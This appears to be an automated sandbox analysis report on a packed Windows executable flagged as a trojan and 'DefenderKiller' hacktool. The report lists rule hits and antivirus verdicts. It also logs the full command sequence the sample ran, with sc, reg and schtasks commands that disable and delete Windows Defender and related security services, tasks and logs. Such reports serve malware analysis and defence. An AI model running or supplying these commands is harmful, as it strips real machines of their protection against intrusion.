Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | April 28, 2025, 10:09 a.m. | April 28, 2025, 10:11 a.m. |
chcp.com chcp 65001
2816 -
reg.exe reg query "HKU\S-1-5-19"
2884 -
reg.exe reg add "HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Themes\Personalize" /v "AppsUseLightTheme" /t reg_dword /d 0 /f
2928 -
chcp.com chcp 65001
2204 -
reg.exe reg query "HKU\S-1-5-19"
2244 -
reg.exe reg add "HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Themes\Personalize" /v "AppsUseLightTheme" /t reg_dword /d 0 /f
2424 -
mode.com Mode 79,49
2524 -
cmd.exe C:\Windows\system32\cmd.exe /c ver
2576 -
reg.exe reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA"
2688 -
find.exe find /i "0x0"
2564 -
-
tasklist.exe tasklist
2872
-
-
reg.exe reg query "HKLM\System\CurrentControlSet\Services\WinDefend"
2868 -
reg.exe reg query "HKLM\System\CurrentControlSet\Services\MDCoreSvc"
604 -
reg.exe reg query "HKLM\System\CurrentControlSet\Services\WdNisSvc"
2988 -
reg.exe reg query "HKLM\System\CurrentControlSet\Services\Sense"
1356 -
reg.exe reg query "HKLM\System\CurrentControlSet\Services\wscsvc"
1384 -
reg.exe reg query "HKLM\System\CurrentControlSet\Services\SgrmBroker"
2472 -
reg.exe reg query "HKLM\System\CurrentControlSet\Services\SecurityHealthService"
2544 -
reg.exe reg query "HKLM\System\CurrentControlSet\Services\webthreatdefsvc"
2612 -
reg.exe reg query "HKLM\System\CurrentControlSet\Services\webthreatdefusersvc"
2800 -
reg.exe reg query "HKLM\System\CurrentControlSet\Services\WdNisDrv"
2924 -
reg.exe reg query "HKLM\System\CurrentControlSet\Services\WdBoot"
2372 -
reg.exe reg query "HKLM\System\CurrentControlSet\Services\WdFilter"
2080 -
reg.exe reg query "HKLM\System\CurrentControlSet\Services\SgrmAgent"
148 -
reg.exe reg query "HKLM\System\CurrentControlSet\Services\MsSecWfp"
2320 -
reg.exe reg query "HKLM\System\CurrentControlSet\Services\MsSecFlt"
2532 -
reg.exe reg query "HKLM\System\CurrentControlSet\Services\MsSecCore"
2608 -
reg.exe reg query HKLM\System\CurrentControlset\Services\WdFilter
2904 -
reg.exe reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion" /v "ProductName"
2392 -
find.exe find /i "Windows 7"
192 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ver "
2240 -
findstr.exe findstr /c:"6.1.7601"
2672 -
sc.exe sc config "WinDefend" start= disabled
2956 -
sc.exe sc stop "WinDefend"
2784 -
sc.exe sc delete "WinDefend"
2380 -
reg.exe reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
2520 -
sc.exe sc config "MDCoreSvc" start= disabled
884 -
sc.exe sc stop "MDCoreSvc"
560 -
sc.exe sc delete "MDCoreSvc"
2208 -
reg.exe reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
504 -
sc.exe sc config "WdNisSvc" start= disabled
2720 -
sc.exe sc stop "WdNisSvc"
1120 -
sc.exe sc delete "WdNisSvc"
2776 -
reg.exe reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
1796 -
sc.exe sc config "Sense" start= disabled
2652 -
sc.exe sc stop "Sense"
2064 -
sc.exe sc delete "Sense"
2052 -
reg.exe reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
1864 -
sc.exe sc config "wscsvc" start= disabled
232 -
sc.exe sc stop "wscsvc"
1892 -
sc.exe sc delete "wscsvc"
1852 -
reg.exe reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
1560 -
sc.exe sc config "SgrmBroker" start= disabled
3108 -
sc.exe sc stop "SgrmBroker"
3156 -
sc.exe sc delete "SgrmBroker"
3204 -
reg.exe reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
3252 -
sc.exe sc config "SecurityHealthService" start= disabled
3300 -
sc.exe sc stop "SecurityHealthService"
3348 -
sc.exe sc delete "SecurityHealthService"
3396 -
reg.exe reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
3444 -
sc.exe sc config "webthreatdefsvc" start= disabled
3488 -
sc.exe sc stop "webthreatdefsvc"
3536 -
sc.exe sc delete "webthreatdefsvc"
3584 -
reg.exe reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
3632 -
sc.exe sc config "webthreatdefusersvc" start= disabled
3676 -
sc.exe sc stop "webthreatdefusersvc"
3732 -
sc.exe sc delete "webthreatdefusersvc"
3780 -
reg.exe reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
3852 -
sc.exe sc config "WdNisDrv" start= disabled
3896 -
sc.exe sc stop "WdNisDrv"
3944 -
sc.exe sc delete "WdNisDrv"
3992 -
reg.exe reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
4040 -
sc.exe sc config "WdBoot" start= disabled
4084 -
sc.exe sc stop "WdBoot"
3128 -
sc.exe sc delete "WdBoot"
3188 -
reg.exe reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
1108 -
sc.exe sc config "WdFilter" start= disabled
3316 -
sc.exe sc stop "WdFilter"
3376 -
sc.exe sc delete "WdFilter"
3460 -
reg.exe reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
3532 -
sc.exe sc config "SgrmAgent" start= disabled
3600 -
sc.exe sc stop "SgrmAgent"
3660 -
sc.exe sc delete "SgrmAgent"
1632 -
reg.exe reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
3680 -
sc.exe sc config "MsSecWfp" start= disabled
3796 -
sc.exe sc stop "MsSecWfp"
3848 -
sc.exe sc delete "MsSecWfp"
3924 -
reg.exe reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
4012 -
sc.exe sc config "MsSecFlt" start= disabled
4072 -
sc.exe sc stop "MsSecFlt"
2932 -
sc.exe sc delete "MsSecFlt"
3216 -
reg.exe reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
3340 -
sc.exe sc config "MsSecCore" start= disabled
3428 -
sc.exe sc stop "MsSecCore"
3552 -
sc.exe sc delete "MsSecCore"
3664 -
reg.exe reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
3692 -
schtasks.exe schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
3812 -
schtasks.exe schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
3964 -
schtasks.exe schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
4060 -
schtasks.exe schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
3184 -
schtasks.exe schtasks /Delete /TN "Microsoft\Windows\AppID\SmartScreenSpecific" /f
3248 -
reg.exe reg delete "HKLM\Software\Microsoft\Windows Defender" /f
3504 -
reg.exe reg delete "HKLM\Software\Microsoft\Windows Defender Security Center" /f
3648 -
reg.exe reg delete "HKLM\Software\Microsoft\Windows Advanced Threat Protection" /f
3704 -
reg.exe reg delete "HKLM\Software\Microsoft\Windows Security Health" /f
3844 -
reg.exe reg delete "HKLM\System\CurrentControlset\Control\WMI\Autologger\DefenderApiLogger" /f
4036 -
reg.exe reg delete "HKLM\System\CurrentControlset\Control\WMI\Autologger\DefenderAuditLogger" /f
4008 -
reg.exe reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
3352 -
reg.exe reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
3564 -
reg.exe reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
1316 -
reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
3784 -
reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
3236 -
reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
3360 -
reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches\Windows Defender" /f
3880 -
reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC" /f
3436 -
reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\NIS-Driver-WFP/Diagnostic" /f
3588 -
reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /f
3424 -
reg.exe reg delete "HKLM\Software\Microsoft\SystemSettings\SettingId\SystemSettings_WindowsDefender_UseWindowsDefender" /f
3628 -
reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NameSpace\{D8559EB9-20C0-410E-BEDA-7ED416AECC2A}" /f
1320 -
sc.exe sc start VMTools
4124 -
sc.exe sc start VMTools
4172
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
No hosts contacted. |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
section |
file | C:\Users\test22\AppData\Local\Temp\Work\nircmd.exe |
file | C:\Users\test22\AppData\Local\Temp\Work\NSudoLG.exe |
file | C:\Users\test22\AppData\Local\Temp\Work\7z.exe |
file | C:\Users\test22\AppData\Local\Temp\34.bat |
file | C:\Users\test22\AppData\Local\Temp\24.bat |
file | C:\Users\test22\AppData\Local\Temp\Work\cecho.exe |
cmdline | schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f |
cmdline | "C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\34.bat" any_word |
cmdline | schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f |
cmdline | C:\Windows\system32\cmd.exe /c ver |
cmdline | schtasks /Delete /TN "Microsoft\Windows\AppID\SmartScreenSpecific" /f |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" ver " |
cmdline | C:\Windows\system32\cmd.exe /c tasklist |
cmdline | schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f |
cmdline | schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f |
file | C:\Users\test22\AppData\Local\Temp\34.bat |
file | C:\Users\test22\AppData\Local\Temp\Work\NSudoLG.exe |
file | C:\Users\test22\AppData\Local\Temp\Work\cecho.exe |
file | C:\Users\test22\AppData\Local\Temp\Work\7z.exe |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process |
section | {u'size_of_data': u'0x0001be00', u'virtual_address': u'0x00001000', u'entropy': 7.996205637989911, u'name': u'', u'virtual_size': u'0x00032000'} | entropy | 7.99620563799 | description | A section with a high entropy has been found | |||||||||
section | {u'size_of_data': u'0x00004800', u'virtual_address': u'0x00033000', u'entropy': 7.973325024284936, u'name': u'', u'virtual_size': u'0x0000b000'} | entropy | 7.97332502428 | description | A section with a high entropy has been found | |||||||||
section | {u'size_of_data': u'0x00000800', u'virtual_address': u'0x0003e000', u'entropy': 7.4688141552761795, u'name': u'', u'virtual_size': u'0x00025000'} | entropy | 7.46881415528 | description | A section with a high entropy has been found | |||||||||
section | {u'size_of_data': u'0x00001000', u'virtual_address': u'0x00064000', u'entropy': 7.764550992600053, u'name': u'', u'virtual_size': u'0x00005000'} | entropy | 7.7645509926 | description | A section with a high entropy has been found | |||||||||
section | {u'size_of_data': u'0x00098200', u'virtual_address': u'0x0036b000', u'entropy': 7.936454714357046, u'name': u'.data', u'virtual_size': u'0x00099000'} | entropy | 7.93645471436 | description | A section with a high entropy has been found | |||||||||
entropy | 0.989361702128 | description | Overall entropy of this PE file is high |
description | Create a windows service | rule | Create_Service | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Communication using DGA | rule | Network_DGA | ||||||
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | Take ScreenShot | rule | ScreenShot | ||||||
description | Escalate priviledges | rule | Escalate_priviledges | ||||||
description | Steal credential | rule | local_credential_Steal | ||||||
description | PWS Memory | rule | Generic_PWS_Memory_Zero | ||||||
description | Record Audio | rule | Sniff_Audio | ||||||
description | Communications over HTTP | rule | Network_HTTP | ||||||
description | Communications use DNS | rule | Network_DNS | ||||||
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerCheck__RemoteAPI | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__ConsoleCtrl | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | (no description) | rule | Check_Dlls | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Anti-Sandbox checks for ThreatExpert | rule | antisb_threatExpert | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Affect hook table | rule | win_hook | ||||||
description | File Downloader | rule | Network_Downloader | ||||||
description | Match Windows Inet API call | rule | Str_Win32_Internet_API | ||||||
description | Communications over FTP | rule | Network_FTP | ||||||
description | Run a KeyLogger | rule | KeyLogger | ||||||
description | Communications over P2P network | rule | Network_P2P_Win | ||||||
description | Create a windows service | rule | Create_Service | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Communication using DGA | rule | Network_DGA | ||||||
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | Take ScreenShot | rule | ScreenShot | ||||||
description | Escalate priviledges | rule | Escalate_priviledges | ||||||
description | Steal credential | rule | local_credential_Steal | ||||||
description | PWS Memory | rule | Generic_PWS_Memory_Zero | ||||||
description | Record Audio | rule | Sniff_Audio | ||||||
description | Communications over HTTP | rule | Network_HTTP | ||||||
description | Communications use DNS | rule | Network_DNS | ||||||
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerCheck__RemoteAPI | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__ConsoleCtrl | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl |
cmdline | reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f |
cmdline | sc delete "MsSecCore" |
cmdline | sc delete "wscsvc" |
cmdline | reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f |
cmdline | schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f |
cmdline | sc config "WdFilter" start= disabled |
cmdline | sc delete "WinDefend" |
cmdline | reg query "HKLM\System\CurrentControlSet\Services\WdFilter" |
cmdline | sc stop "WdFilter" |
cmdline | reg delete "HKLM\System\CurrentControlset\Control\WMI\Autologger\DefenderApiLogger" /f |
cmdline | sc delete "WdNisSvc" |
cmdline | schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f |
cmdline | sc stop "SgrmAgent" |
cmdline | NSudoLG -U:T -P:E -UseCurrentConsole C:\Users\test22\AppData\Local\Temp\34.bat |
cmdline | reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f |
cmdline | C:\Users\test22\AppData\Local\Temp\34.bat |
cmdline | reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f |
cmdline | tasklist |
cmdline | sc stop "webthreatdefsvc" |
cmdline | reg delete "HKLM\Software\Microsoft\SystemSettings\SettingId\SystemSettings_WindowsDefender_UseWindowsDefender" /f |
cmdline | reg query "HKLM\System\CurrentControlSet\Services\MsSecCore" |
cmdline | sc stop "MsSecWfp" |
cmdline | reg query "HKLM\System\CurrentControlSet\Services\wscsvc" |
cmdline | reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f |
cmdline | reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f |
cmdline | reg query "HKLM\System\CurrentControlSet\Services\WdNisSvc" |
cmdline | schtasks /Delete /TN "Microsoft\Windows\AppID\SmartScreenSpecific" /f |
cmdline | sc config "Sense" start= disabled |
cmdline | reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f |
cmdline | sc delete "WdNisDrv" |
cmdline | reg query "HKLM\System\CurrentControlSet\Services\MDCoreSvc" |
cmdline | reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f |
cmdline | reg query "HKLM\System\CurrentControlSet\Services\WinDefend" |
cmdline | sc config "MsSecCore" start= disabled |
cmdline | sc config "webthreatdefsvc" start= disabled |
cmdline | sc delete "WdBoot" |
cmdline | sc stop "SgrmBroker" |
cmdline | sc config "WdBoot" start= disabled |
cmdline | reg query "HKU\S-1-5-19" |
cmdline | sc config "SgrmAgent" start= disabled |
cmdline | sc delete "Sense" |
cmdline | reg delete "HKLM\Software\Microsoft\Windows Advanced Threat Protection" /f |
cmdline | C:\Windows\system32\cmd.exe /c tasklist |
cmdline | sc stop "WdBoot" |
cmdline | reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f |
cmdline | reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NameSpace\{D8559EB9-20C0-410E-BEDA-7ED416AECC2A}" /f |
cmdline | sc stop "MsSecCore" |
cmdline | reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f |
cmdline | reg query "HKLM\System\CurrentControlSet\Services\WdBoot" |
cmdline | sc delete "SecurityHealthService" |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\SpyNet |
Bkav | W32.AIDetectMalware |
Cynet | Malicious (score: 100) |
Skyhigh | BehavesLike.Win32.Generic.vc |
ALYac | Trojan.Rasftuby.Gen.14 |
Cylance | Unsafe |
VIPRE | Trojan.Rasftuby.Gen.14 |
CrowdStrike | win/grayware_confidence_60% (D) |
BitDefender | Trojan.Rasftuby.Gen.14 |
Arcabit | Trojan.Rasftuby.Gen.14 |
Elastic | malicious (high confidence) |
ESET-NOD32 | a variant of Win32/Packed.Enigma.AAF |
APEX | Malicious |
Avast | WAT:Blacked-E |
ClamAV | Win.Trojan.Scar-6903585-0 |
Kaspersky | HackTool.BAT.DefenderKiller.a |
MicroWorld-eScan | Trojan.Rasftuby.Gen.14 |
Emsisoft | Trojan.Rasftuby.Gen.14 (B) |
F-Secure | Trojan.TR/Dropper.Gen |
DrWeb | Tool.NirCmd.4 |
McAfeeD | ti!E2AEF88DD7C7 |
Trapmine | malicious.high.ml.score |
CTX | exe.trojan.rasftuby |
Sophos | Generic ML PUA (PUA) |
Avira | TR/Dropper.Gen |
Microsoft | Trojan:Win32/Tnega!ml |
GData | Trojan.Rasftuby.Gen.14 |
DeepInstinct | MALICIOUS |
VBA32 | BScope.Trojan.Bitrep |
Malwarebytes | AdRepack.Adware.Packer.DDS |
Ikarus | Gen.Packer.PESpin |
Zoner | Probably Heur.ExeHeaderL |
Fortinet | Riskware/Application |
AVG | WAT:Blacked-E |